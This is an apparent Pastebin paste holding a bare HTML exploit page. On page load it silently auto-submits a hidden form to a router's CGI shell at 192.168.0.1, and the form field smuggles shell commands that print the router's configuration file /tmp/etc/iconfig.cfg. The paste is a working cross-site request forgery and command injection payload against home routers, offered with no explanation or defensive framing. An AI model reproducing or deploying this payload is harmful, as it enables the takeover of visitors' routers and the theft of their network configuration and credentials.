Advertisement
Guest User

Untitled

a guest
Jun 19th, 2016
126
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.37 KB | None | 0 0
  1. <html>
  2. <head>
  3. <script>
  4. function s() {
  5.   document.f.submit();
  6. }
  7. </script>
  8. </head>
  9. <body onload="s()">
  10. <form id="f" name="f" method="POST" action="http://192.168.0.1/cgi-bin/sh" enctype="text/plain">
  11. <input type="hidden" name="X" value="X;echo 'Content-type: text/plain';echo;echo Content of /tmp/etc/iconfig.cfg;echo;cat /tmp/etc/iconfig.cfg;">
  12. </form>
  13. </body>
  14. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement